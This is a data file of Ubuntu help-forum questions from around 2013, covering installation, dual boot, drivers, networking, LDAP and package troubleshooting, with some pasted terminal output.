322198	can i simulate a button press on a web page from terminal	i found that we can read gmail messages from a terminal window by using curl curl -u user -- silent `` https : //mail.google.com/mail/feed/atom '' i would now like to submit some text ( from a textarea + button press ) from terminal . so what are the steps to identify the action triggered when a button is pressed and how to simulate the same actions in terminal ? for example , i want to simulate 'pass data ' & 'button press ' ( submit ) of http : //tokira.net/unicode/index.php
322205	ubuntu installing issue	i 've tried two ways to install ubuntu ! the one that i used more times , is via bootable usb drive ! i 've downloaded the iso from the authorized site ! i have a 500 gb hdd and i 've partitioned it firstly in 2 partitions one with my windows 7 os and my programs and another with my media , files , etc . then i took free space ( 25 gb ) from the second partition and i made it free space . i installed ubuntu 13.04 via the usb stick using 18gb from the free space for the ubuntu os using mounting point of `` / '' formatted as `` ext4 '' . i also used 8192 gb of my free space for swap ! the installation completed successfully but after the reboot i am not shown the options to choose which os to use and windows start automatically . i 've also tried to find the partition in the boot menu but it is not visible even there ! i did the same thing 5-6 times with the same result ! the second way that i tried to install ubuntu 12.04 lts was via windows installer ! i installed it on a new partition this time , because i do n't want to have windows 7 os and ubuntu os in the same partition , and at the end of the installation an error message appeared . i pressed `` ok '' and then my pc rebooted again ! please can you take a look at the methods i used above and tell me where i am going wrong , especially for the 1st method of installation ?
322213	can i install ubuntu for tablet on my galaxy tab 2 and where can i get it	i have been watching the canonical ads for ubuntu touch on tablet and i am very impressed , however can it be installed on my galaxy tab 2 gt-p5100 ? if so where can i get it ? how much does it cost ? how do i do the install ? i am currently running ubuntu 12 point something via the linuxonandroid install chroot method and while it is fantastic the features claimed by ubuntu touch look too good not to try .
322215	how to access ubuntu files from another ubuntu installation on the same pc	to be quick . i had windows 7 and ubuntu . i installed a new windows 7 copy and now it does n't show ubuntu on windows boot manager . i need to access to the files on ubuntu . i tried to install ext2explore etc . but i have had so many problems with the installations . i wonder if i should just run another ubuntu from live cd and somehow access to the old ubuntu files from there , or is there another way ? -- -edit -- - i can see my files from live cd but ca n't do anything with them . i 'm trying to follow this guide http : //www.howtogeek.com/howto/ubuntu/reinstall-ubuntu-grub-bootloader-after-windows-wipes-it-out/ but when i write in terminal ubuntu @ ubuntu : ~ $ sudo grub it says command not found
322220	what languages does pluma / gedit text editor cover for syntax highlighting ?	i 've tried a google search and even tried wikipedia . https : //projects.gnome.org/gedit/ says : features : ... configurable syntax highlighting for various languages ( c , c++ , java , html , xml , python , perl and many others ) this is the closest thing i could find . is there a complete list of languages including those others ? ( c # must also be included as well right ? )
322226	ubuntu touch `` saucy '' or other no boot exclude `` quantal ''	i build sources for my device . then i download saucy-preinstalled-touch-armhf.zip . but its no boot . i tried all and work only mwc demo zip . it was said that it is `` hybris '' problems . i tried build with new `` hybris '' . but no difference . now mwc demo no booting . whats me need do ? i tried on 3 phones . sony xperia z and acro s and lg optimus black .
322228	facebook photos do n't appear on firefox and google chrome	i use ubuntu 13.04 os and when i install google chrome and firefox and open facebook for the first 2 days it works perfect , and suddenly some images do n't appear like my friends profile pictures or shared photos while others appear , this is a print screen . this problem occurs with facebook only . how can i solve it ?
322230	how do i switch to cinnamon/nemo at the login screen ?	kind of a new user to ubuntu , and need some help . i tried to install the cinnamon desktop ( nemo , i think is its code-name ? ) environment on ubuntu 13.04 ( 64 bit ) and i typed the following into terminal : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon nemo and i updated again , just to be sure . no harm in double-checking , right ? everything checked out okay , no error messages or anything , but the de switcher at login does n't appear anywhere on the screen . and after i type my password nothing else appears . anyone who can help , i 'd love to start using the awesome environment !
322234	package system broken / unable to install updates due to incorrect ( ? ) disk full message	here 's a copy of part of the output i 'm seeing when i try to update ; dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-49_3.2.0-49.75_all.deb ( -- unpack ) : error creating directory `./usr/src/linux-headers-3.2.0-49/arch/m68k/platform/68ez328 ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-49_3.2.0-49.75_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) colin @ colin-satellite-a60 : ~ $ df -h filesystem size used avail use % mounted on /dev/sda6 11g 8.5g 1.6g 85 % / udev 336m 4.0k 336m 1 % /dev tmpfs 138m 768k 137m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 343m 88k 343m 1 % /run/shm i 've tried the usual sudo apt-get install -f as well as sudo apt-get clean without success - i know i 've got a lot of old linux kernels installed which i ca n't remove because of the disk space full error , so i 'm running out ideas , can anyone advise please ? note this is xubuntu running on an ancient toshiba a60 laptop as a wubi install iirc : - }
322235	ceph openstack ha installation with maas and juju but partially on physical servers and few on virtual machines	i am planning to deploy openstackha which 28 servers , which is quit a lot for me . so i am thinking to put up few of roles like rabbitmq , mysql , cloud controller , horizon on virtual machines on kvm might . and ceph , network node and compute nodes on physical servers . so , is it possible to implement in such way ? any precautionary steps to be taken ?
322237	non existing mount points fails to automount on boot , how to fix this ?	i think i 've messed up something with my partition mount points . ok , this is the thing . when i have been fresh installing ubuntu 12.10 from a live cd , i made all my partitions with ext4 file system format and mounted them at random mount points ( now special interest on /dos and /windows , see it here ) . after installation complete , i was n't happy without seeing my partitions appear as shown in a picture at the red `` a '' . as i had them there on my previous older laptop , witch was dual boot alongside with wimxp , and these partitions were ntfs . so i decided to format them back to ntfs . i 've labeled these hdd1 and and hdd2 . and somehow it become mounted an the directory /mnt/33e6e20a00342e2d and /mt/486ffa615d0979a2 seen in this picture at `` b '' and `` c '' marks . despites all that , in general it worked all fine . until i boot the machine next time , i encountered with the problem explaned here : `` how to avoid `` s to skip '' message on boot ? '' . i did try all the mentioned solutions and none worked in my case . as in my case there in no longer any partition as /dos and /windows . now from here : `` specifying a custom mount point for an empty partition '' , i found that it may be the better way of having my partitions in a place `` a '' in this picture . i am willing to reformat these partitions back again to ext4 , and mount them in a folder as /example/hdd1 and /example/hdd2 so i easy and quick access when needed . but i get now very confused what to do next . should i use disks or gparted ? and what should i do with my `` s to skip '' ? i ca n't just delete these directories . bonus : ! picture with `` a , b , c '' ! picture with 2 folders selected ( containing a total of 0 items ) ! picture with disks-sda1 selected ( hdd1 , /windows before ) ! picture with disks-sda5 selected ( hdd2 , /dos before ) ! picture with gparted ! ca n't delete folder ( directory with 0 items ) edit 1 i have just deleted the directories using nautilus as root . here is the process outcome : gedis @ gedis-a8j : ~ $ sudo su [ sudo ] password for gedis : root @ gedis-a8j : /home/gedis # nautilus nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** ( nautilus:24006 ) : warning ** : could not inhibit power management : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : name `` org.gnome.sessionmanager '' does not exist ** ( nautilus:24006 ) : warning ** : could not inhibit power management : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : name `` org.gnome.sessionmanager '' does not exist root @ gedis-a8j : /home/gedis # exit exit /bin/rm : can not remove `/run/user/root/gvfs ' : is a directory gedis @ gedis-a8j : ~ $ after rebooting the problem `` press s to skip '' is still here . will try now updating the grub2 edit 2 just updated the grub2 . this is the process outcome : gedis @ gedis-a8j : ~ $ sudo su [ sudo ] password for gedis : root @ gedis-a8j : /home/gedis # gksu update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-36-generic found initrd image : /boot/initrd.img-3.5.0-36-generic found linux image : /boot/vmlinuz-3.5.0-34-generic found initrd image : /boot/initrd.img-3.5.0-34-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin done root @ gedis-a8j : /home/gedis # exit exit gedis @ gedis-a8j : ~ $ exit after rebooting the problem `` press s to skip '' is still here ... how can i fix this ?
322242	installing 13.04 failure	i tried to upgrade ubuntu 12.10 to 13.04 . after upgrade ubuntu did n't work any more ( screen gets locked , no mouse , no kb ) . i tried to install via dvd . after install , same issue . i used the try from dvd without install option . same result . after destroying my good old , and fast , and reliable ubuntu 12.10 , i ca n't install the new one . ctrl+alt+f1 works only before i choose `` try from dvd '' option . at that time kb and mouse works . after choosing to try before install , kb and mouse are unresponsive
322244	ubuntu takes complete hard disk for installation without considering pre-existing partitions	i have recently installed windows 7 on my laptop with 320 gb hd . then , i made a partition so now i have 2 primary and 3 logical partitions ( all ntfs ) . i want to install ubuntu 12.10 so i used ube and ubuntu 12.10 live . but problem is whenever i try to install ubuntu from pen drive , it shows that there are no partitions so it wants to partition the whole hard disk . i searched on web but did n't find suitable a solution . my question is how can i install ubuntu in this case ?
322250	resetting network settings in ubuntu 13.04	in my ubuntu 13.04 i was messing around with the network connections without creating backups . now i have done something to the network after which the network manager is n't showing up at top right . i use ppp and when i run the command sudo pppoeconf it runs perfectly but it doesnât connect to the internet . to connect , i opened another account in ubuntu and i can connect easily through that account . i used these commands in my older account as far as i recall : airodump-ng wlan0 airodump-ng eth0 is there any way to reset the network configuration to the initial installation state ?
322252	upgrading from ubuntu 12.04 to 13.10	how do i upgrade from ubuntu 12.04 to ubuntu 13.10 . i have tried the one i this link i gives option to upgrade to 12.10 not 13.10 i want to directly upgrade to 13.10 from 12.04
322253	reducing amount of primary partitions	hello i 'm trying to create room to install windows on a pre-installed ubuntu 12.04 laptop . i 'm using gparted and currently my partitions look like this obviously i 'm over 4 primary partitions and i 'd like to know what/if i can move/change into extended partitions so i can free up room to convert my unallocated into a new primary partition . i know i can delete the first one as that 's my recovery partition from dell , but when i tried to create a recovery usb and cd i 've been greeted with an error message so i 'm worried if all goes wrong i wo n't get my factory settings back again .
322255	menue bar and launcher	i recently installed xorg 1.11 and fglrx 12.6 on my machine and after restarting system that worked as well . that was good also at the game time . the unity menuebar/launcher and panel left after i switched back from win7 . ( ubuntu 2d havent this issue ) what is the problem ? any idea ? i tried to reset unuity hamed @ linu-pc : /usr/bin $ sudo unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1400004 compiz ( core ) - warn : failed to receive configurenotify event on 0x320078b initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:4728 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2013-07-20 19:11:44 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' error 2013-07-20 19:11:45 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported warn 2013-07-20 19:11:45 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:11:45 unity < unknown > :0 failed to fetch paths : process /usr/lib/bamf/bamfdaemon exited with status 1 initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xc00090 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . initializing annotate options ... done initializing blur options ... done initializing clone options ... done initializing commands options ... done initializing cube options ... done initializing obs options ... done initializing rotate options ... done initializing screenshot options ... done initializing staticswitcher options ... done initializing switcher options ... done initializing water options ... done initializing wobbly options ... done warn 2013-07-20 19:11:45 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-07-20 19:11:45 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-07-20 19:11:45 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-07-20 19:11:45 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/activity-log-manager-ccpanel.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-07-20 19:11:45 unity.libindicator < unknown > :0 unable to find group 'x-activity-log-manager shortcut group' warn 2013-07-20 19:11:45 unity < unknown > :0 failed to fetch paths : process /usr/lib/bamf/bamfdaemon exited with status 1 setting update `` main_menu_key '' setting update `` run_key '' warn 2013-07-20 19:11:46 unity.glib.dbusproxy glibdbusproxy.cpp:182 unable to connect to proxy : error calling startservicebyname for com.canonical.unity.panel.service : gdbus.error : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/unity/unity-panel-service exited with status 1 warn 2013-07-20 19:11:46 unity.glib.dbusproxy glibdbusproxy.cpp:182 unable to connect to proxy : error calling startservicebyname for org.gnome.nautilus : gdbus.error : org.freedesktop.dbus.error.spawn.childexited : process /usr/bin/nautilus exited with status 1 warn 2013-07-20 19:21:15 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:21:30 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:21:38 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:23:06 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:24:47 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 warn 2013-07-20 19:29:36 unity < unknown > :0 failed to fetch path : process /usr/lib/bamf/bamfdaemon exited with status 1 data about kernel fglrx and xorg : root @ linu-pc : ~ # uname -a linux linu-pc 3.2.0-49-generic-pae # 75-ubuntu smp tue jun 18 18:00:21 utc 2013 i686 athlon i386 gnu/linux root @ linu-pc : ~ # x -version x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic i686 ubuntu current operating system : linux linu-pc 3.2.0-49-generic-pae # 75-ubuntu smp tue jun 18 18:00:21 utc 2013 i686 kernel command line : boot_image=/boot/vmlinuz-3.2.0-49-generic-pae root=uuid=9e5ae4eb-3013-43c9-a790-a9cdd85f786d ro recovery nomodeset build date : 11 april 2013 01:04:30pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . root @ linu-pc : ~ # fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4600 series opengl version string : 3.3.11627 compatibility profile context root @ linu-pc : /usr/bin # sudo lspci -v 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv730xt [ radeon hd 4670 ] ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 0276 flags : bus master , fast devsel , latency 0 , irq 44 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fdfe0000 ( 64-bit , non-prefetchable ) [ size=64k ] i/o ports at ee00 [ size=256 ] [ virtual ] expansion rom at fdf00000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > kernel driver in use : fglrx_pci kernel modules : fglrx , radeon root @ linu-pc : /usr/bin # sudo lsmod module size used by pppoe 17513 2 pppox 13158 1 pppoe pci_stub 12550 1 vboxpci 22911 0 vboxnetadp 13328 0 vboxnetflt 27240 0 vboxdrv 252228 3 vboxpci , vboxnetadp , vboxnetflt rfcomm 38139 0 bnep 17830 2 bluetooth 158479 10 rfcomm , bnep binfmt_misc 17292 1 lp 17455 0 snd_hda_codec_hdmi 31775 1 snd_hda_codec_realtek 174313 1 snd_hda_intel 32719 5 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi rndis_wlan 28472 0 snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event cfg80211 178877 1 rndis_wlan snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq rndis_host 13560 1 rndis_wlan cdc_ether 13312 1 rndis_host usbnet 25214 3 rndis_wlan , rndis_host , cdc_ether joydev 17393 0 ppdev 12849 0 snd 62218 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 86520 0 sp5100_tco 13495 0 parport_pc 32114 1 parport 40930 3 lp , ppdev , parport_pc mac_hid 13077 0 i2c_piix4 13093 0 serio_raw 13027 0 k10temp 12990 0 ati_agp 13242 0 soundcore 14635 1 snd wmi 18744 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm fglrx 2909978 166 usbhid 41937 0 hid 77428 1 usbhid firewire_ohci 40172 0 firewire_core 56940 1 firewire_ohci crc_itu_t 12627 1 firewire_core pata_atiixp 12999 0 floppy 60184 0 r8169 56368 0 update : root @ linu-pc : / # /usr/lib/nux/unity_support_test -p opengl vendor string : ati technologies inc. opengl renderer string : ati radeon hd 4600 series opengl version string : 3.3.11627 compatibility profile context not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes root @ linu-pc : / # sudo -- lshw -c display *-display description : vga compatible controller product : rv730xt [ radeon hd 4670 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:44 memory : d0000000-dfffffff memory : fdfe0000-fdfeffff ioport : ee00 ( size=256 ) memory : fdf00000-fdf1ffff
322261	evolution wo n't retrieve gmail	since i upgraded to 12.04 , evolution does n't retrieve mail from my gmail address . mail is not automatically retrieved anymore and when i hit the send/receive button , it gets stuck on updating . how do i fix this ?
322263	ubuntu 12.04 installation on sony vaio vgn-ux390n - monitor blank on right , vertical lines on left	i recently installed 12.04 onto this little sony , taking everything but the small recovery partition for its original vista os , and everything went well . yesterday , i noticed when i turned it on , the screen was blank on the right , with vertical lines on the left - the colors of the vertical lines match the logon screen , during boot-up , but then the logon screen appeared , i entered my password , and everything worked well . i installed dropbox , synced it with my other 12.04 machine , then installed dropbox , and synced it . at this point , the battery was starting to get low , so i placed the sony onto it 's docking port , where the power cord was plugged in , and the screen went blank on the left , with vertical lines on the right . as i could n't get the machine to do anything , and was therefore unable to shutdown properly , so i removed it from the docking platform , to let the battery run down , as i have it set to shut down due to low battery . this morning , i energized the machine , and found the same issue . i have tried starting on the battery , with the plugged in docking port , with the power cord plugged directly into the computer , and each of the previous methods with the battery removed , to no avail . i have tried to get into the bios with the fn + f1 , f2 , f3 and f4 with no joy . i tried powering on while pressing esc - no joy . i read something to do with video speed/stamina switch , which sounded like a physical switch , but have been unable to find anything specific to this computer . i am hoping that some of you who are smarter than me , may have the answer . thanks for reading , and thanks for any insight you may be able to provide . -chris
322264	having trouble installing ubuntu studio 13.04	i am currently trying to install ubuntu studio 13.04 along side windows 7 . when i boot into the usb stick , i make the proper selections and it reboots . when i boot into windows 7 and open wubi.exe , i am given a choice to run demo or learn more ( i do n't get the screen that allows you to select drive size and what not ) . it says that i can install from the demo , so i make the proper selection , then it reboots . how can i overcome this and install ubuntu studio ?
322267	how do i reinstall everything ubuntu related software on my system ?	yesterday , i was tired and i did something pretty stupid . apache was n't working , so i decided to reinstall everything related to apache2 . so i began by removing apache2 and then did the following : sudo apt-get remove libapr* after this , everything that depended on libapr* was erased , including apt , the software center , several python stuff , transmission ... how do i get everything back ? especially apt ...
322269	using ubuntu on a flash drive in windows 8	i have a new hp pavilion g6 2240nr with 64 bit amd6and a factory install of windows8 and would like to run ubuntu from a flash drive without installing it and be able to switch back a forth.has anyone done this or know how ? i have tried the netboot way described on there site but it just booted back to win 8.i guess what i need to know is first what version of ubuntu to use and how to get it on the flash drive and to get the drive to dual boot in win 8.idealy i would like it so when i had the flash drive in and started it it would boot to ubuntu and to boot back to win 8 with it out.my problem has been there is a lot of different info on line that i read but thay all are a bit different than what i want to do ... ..thank you also my experience with ubuntu is only loading it on a laptop from a disc ... wayne
322270	gtk2 applications are not themed correctly	on my ubuntu 13.04 machine suddenly all gtk2 applications ( like firefox , libreoffice etc . ) are not themed anymore ( i am using ubuntu 's standard theme ) . instead , they are shown with this ugly old default theme . i did n't do anything that could have caused that behaviour , as far as i know . does anybody know what to do ? update : maybe a system crash ( i had before ) , that forced me to do a cold reboot , has damaged some system configurations files . but i do n't have an idea which one , or how to check . the screenshot shows the problem : gedit is themed and firefox is not . it occurs only when i log in with my user account . with any other everything is ok .
322275	ubuntu install does n't see windows 7	i have researched this and tried the suggested solutions and have n't been able to fix it in my case . i have a dell inspriron 15 r se . it came pre-loaded with windows 8 . i booted into the bios and turned off efi security and installed windows 7 and i 'm now trying to install ubuntu in a dual boot situation . when i run the installer it tells me there is no os installed but , when i read up on this it says that you can run sudo os-prober or sudo winosdata=true os-prober . it finds my windows 7 installation . however when i run winosdata=true ubiquity , i still get the message saying there is no os installed . i have split my 1tb drive putting aside a ext4 partition ( about 350 gb ) and a linux-swap partition ( 5 gb ) for the installation , but it 's only picking up the whole 1tb drive and not the two partitions i created and of course it does n't see the windows installation . edit : i have also ran gparted when booted into the live cd . it only sees my hd as one big 1tb partition . it does not see the swap partition or the ext4 partition i created nor does it mention anything about windows being installed what else can i do to get ubuntu installed ? thanks in advance !
322277	downloading flac with transmission	i am new to using transmission to d/l flac pkgs from archive.org . i notice the files are huge , and include ogg vorbit and two versions of mp3 . is it possible to configure so i only get flac and relavent flac files ?
322278	cron creating empty files in the root directory	it creates files with 0 bytes , with the same name as the php being called in the task . i have a task that runs every minute , my folder /root is crowded . my task : * * * * * /usr/bin/wget -q https : //domain/script.php how to stop creating these files ?
322283	how to set up opengl on a dual graphics card laptop	i 'm having trouble in getting newer version opengl . first , i get my graphics cards information using : lspci -nnk | grep vga and it returns : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) and 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf119 [ geforce gt 520m ] [ 10de:1050 ] ( rev a1 ) when i use : glxinfo | grep op command , it returns opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ironlake mobile x86/mmx/sse2 opengl version string : 2.1 mesa 9.0 opengl shading language version string : 1.20 opengl extensions : my questions are : how do i get new driver to use a newer version mesa ? i installed mesa 9.1.5 , but it 's not shown in glxinfo . how do i use my nvidia graphics card ? i installed nvidia-current and bumblebee . i tried optirun to run a program , it worked at first , but then it crashed when i ran it again . since i want a newer version of opengl and mesa only only supports opengl 3.1. btw : the crash information is : [ 157.097081 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` mouse '' ( module does not exist , 0 ) [ 157.097158 ] [ error ] aborting because fallback start is disabled . how do i get opengl 4.1 or newer development package ? my laptop information ( from the tag ) : acer aspire 4743g intel core i5-480m 2gb ddr3 memory
322287	why are my ldap logins slow ?	i have been running this server with ldap for about 6 months . the logins have always been fast . however , starting this week logins are taking 1-2 minutes to complete . this include ssh , sudo su , and local logins . the openldap database is being hosted by the server that is having the speed problems . i have two other servers that use this same openldap database for authentication , they do n't have any problems with speed . the server is ubuntu server 12.04 lts running openldap 2.4.28 . the two working servers are both running ubuntu server 12.04 lts also . i did notice that when logging in i get a failed to add entry for user mbrown . just after the login completes . i have tried adding usedns no to /etc/sshd_config and have also tried commenting out the line session optional pam_ck_connector.so nox11 from /etc/pam.d/common-session . neither has sped up the login . i have also verified that my /etc/hosts file is correctly set up . what else could be causing such a slow login ?
322290	how can i fix airmon-ng giving a black screen ?	when i run sudo airmon-ng or airmon-ng wlan0 , it shows a black screen . i ca n't take a screenshot of it or copy it and ca n't type anything using the keyboard . i tried re-installing but got the same result . i also tried re-installing ubuntu . i ca n't even switch screen or try any shortcuts to remove the black screen . what should i do ? i have : ubuntu 13.04 broadcom bcm43142
322292	how to forbid kubuntu 13.04 task manager to group similar instances of an opened program ?	kubuntu task manager ( taskbar at the bottom of the desktop ) groups similar instances of a program . how forbid it ? i want similar instances follow one another .
322293	how can libreoffice forbid me to paste from clipboard ?	i have a rather interesting problem . i 've been having an issue with lo for some time now , sometimes it does not allow me to save documents , giving me a warning saying '' can not save file : locked by 'unnknown user ' '' or someting similar . now when i want to save the text in the document and paste it into a new file to workaround the issue [ this has worked two or three times ] i can not paste to the new .odt file i created . i also can not paste into any other application , be it gedit or a browser using google docs . i am sort of lost here , as i really need the text from my clipboard . what can i do ?
322304	how to install hp scanjet 200 in ubuntu 12.04 ?	unable to scan with hp scan-jet 200 . when i type lsusb command in terminal it shows the scanner details . i opened the simple scan which displays no scanners found , and x sane image scanners also displays the same error .
322309	how to provide unity desktop integration features to site on chromium	i have installed firefox and chromium browser , both are working well , but i am constantly using chromium , still it 's not supported to unity desktop integration , default firefox having unity integration , facebook , twitter and youtube and other account get on firefox , but how i get it for my chromium browser integration
322314	ldap connection	my problem : i cant use my addressbook from memotoo in thunderbird or evolution when connected via ldap . i have a usual ubuntu 13.04 , without strange modifications . config . ( standard config ) and password-request were ok . but the ldap-addressbook is empty . so i tried : telnet ldap.memotoo.com 389 trying 88.190.31.67 ... connected to dd32442.memotoo.com . escape character is '^ ] ' . connection closed by foreign host . the connection is closed `` by foreign host '' . who is foreign host closing my connection after 2 seconds ? lsof -i :389 command pid user fd type device size/off node name evolution 9432 xxx zzz ipv4 1133648 0t0 tcp yyyy.myrouter:36446- > dd32442.memotoo.com : ldap ( close_wait ) evolution 9432 xxx zzz ipv4 1738153 0t0 tcp yyyy.myrouter:36612- > dd32442.memotoo.com : ldap ( close_wait ) nmap : nmap 88.190.31.67 -p 389 starting nmap 6.00 ( http : //nmap.org ) at nmap scan report for dd32442.memotoo.com ( 88.190.31.67 ) host is up ( 0.038s latency ) . port state service 389/tcp open ldap nmap 127.0.0.1 -p 389 starting nmap 6.00 ( http : //nmap.org ) at xxx nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000074s latency ) . port state service 389/tcp closed ldap netstat : while writing the contact name into the `` to '' field ( tbird ) , it is connected ( automatic completion ) netstat -an | grep 389 tcp 0 0 192.168.178.25:51579 88.190.31.67:389 connected results : ldap-addressbook is empty when writing an email , the automatic contact completion is not working
322315	how to install intel hd 4000 grapics driver	i just installed ubuntu 13.04 on my hp laptop with amd amd intel graphics card . i want use only intel card , but there is n't drivers in option ( picture ) . should i just install drivers from this page ? https : //01.org/linuxgraphics/downloads
322316	i ca n't find my user password or change it	in the terminal , whenever i try to perform sudo , ubuntu asks my password and it always says i typed it in wrong . i tried changing the password as root , but then it says password unchanged . my user do n't have to enter its password on the login screen , and i think that may have something to do with it . does anyone know how to fix this ?
322317	set default java in .bashrc	by default my ubuntu system is installed with the following java version : java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) if i type which java it tells me /usr/bin/java . now , i have just installed oracle 's java from their website and have unpacked it inside the directory : opt/local how do i make the default java start from opt/local so that i am using oracle java instead of openjdk ? is this something i need to auto-configure inside my bashrc ? ` thanks , and if you need more information let me know !
322318	mozilla plugin not found to install icedtea	i could n't configure icedtea web plugin because the ./configure commands fails due to an such an error : package requirements ( mozilla-plugin ) were not met : no package 'mozilla-plugin ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables mozilla_cflags and mozilla_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i tried to install xulrunner to no avail . what should i do ?
322319	kubuntu 13.04 fails to boot after software update	this morning kubuntu presented , as usual , a list of automatic software update . it was an important list , with a lot of applications involved and kde . there has been an error with some of the packages but the update manager told to restart the systems , but the system is unable to boot . trying to restart with older kernels or safe mode , also fail . tried the option `` fix packages '' but again there are problemas with some kde packages . grub is working , even kubuntu logo is displayed but i never reach to login sreen , some error messages very quickly are displayed ( i do n't have time to read them ) and then a black screen is displayed . however shutdown works and even shutdown text messages are displayed . at this moment i ca n't use my computer . thank you .
